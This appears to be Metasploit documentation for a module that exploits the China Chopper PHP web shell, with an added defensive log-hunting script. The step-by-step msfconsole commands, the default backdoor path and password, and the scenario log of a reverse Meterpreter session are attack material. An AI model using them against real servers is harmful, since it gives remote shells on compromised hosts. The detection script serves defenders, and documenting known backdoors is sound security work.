## Vulnerable Application

The China Chopper Caidao PHP Backdoor, or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html), is a webshell manager coded in PHP.

The [PHP code](https://github.com/rapid7/metasploit-framework/files/430643/caidao.zip) of the backdoor is available for download; save it as `caidao.php`.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
  4. Do: `set rport port`
  5. Do: `set rhost ip`
  6. Do: `check`
  7. The output should be:
     ```
     [+] 192.168.1.103:80 - The target is vulnerable.
     ```
  8. Do: `exploit`
  9. You should get a shell.

## Options

  **TARGETURI**

  TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
  
  **PASSWORD**
  
  PASSWORD by default is `chopper`, which is the password of the backdoor.
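
A log-hunting check for defenders, added here as an example (it is not part of the module or its documentation): it flags successful requests to the default TARGETURI `/caidao.php` and, because the filename can be changed, PHP files that are only ever reached via POST. The combined log format, the sample lines and the POST-only heuristic are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
192.168.1.50 - - [02/Nov/2015:09:01:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.50 - - [02/Nov/2015:09:01:12 +0000] "POST /index.php HTTP/1.1" 302 0 "http://site/index.php" "Mozilla/5.0"
192.168.1.108 - - [02/Nov/2015:09:05:50 +0000] "POST /caidao.php HTTP/1.1" 200 12 "-" "Mozilla/4.0"
192.168.1.108 - - [02/Nov/2015:09:05:54 +0000] "POST /caidao.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.168.1.77 - - [02/Nov/2015:09:07:00 +0000] "POST /uploads/img.php HTTP/1.1" 200 4 "-" "-"
192.168.1.50 - - [02/Nov/2015:09:08:00 +0000] "GET /uploads/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
    r'(?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
DEFAULT_PATH = "/caidao.php"  # the module's default TARGETURI, from the Options section


def hunt(log_text, known_paths=(DEFAULT_PATH,)):
    """Return {path: {"reason": ..., "clients": [IPs]}} for suspicious PHP paths."""
    methods = defaultdict(set)  # path -> HTTP methods answered with a 2xx status
    clients = defaultdict(set)  # path -> client IPs that POSTed to it
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue  # skip unparsable lines and non-2xx responses
        path = m["uri"].split("?", 1)[0]
        if not path.lower().endswith(".php"):
            continue
        methods[path].add(m["method"])
        if m["method"] == "POST":
            clients[path].add(m["ip"])
    findings = {}
    for path, seen in methods.items():
        if path.lower() in known_paths:
            reason = "default backdoor filename"
        elif seen == {"POST"}:
            reason = "PHP file reached only via POST"  # heuristic (assumption), needs triage
        else:
            continue
        findings[path] = {"reason": reason, "clients": sorted(clients[path])}
    return findings


if __name__ == "__main__":
    for path, info in hunt(SAMPLE_LOG).items():
        print(path, info)
```

A POST-only hit is a lead for triage, not proof: compare the flagged file on disk against the deployed application before acting on it.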

## Scenarios

```
msf exploit(caidao_php_backdoor_exec) > exploit

[*] Started reverse handler on 192.168.1.108:4444 
[*] Sending stage (33068 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000

meterpreter > sysinfo 
Computer    : kali
OS          : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
Meterpreter : php/php
```
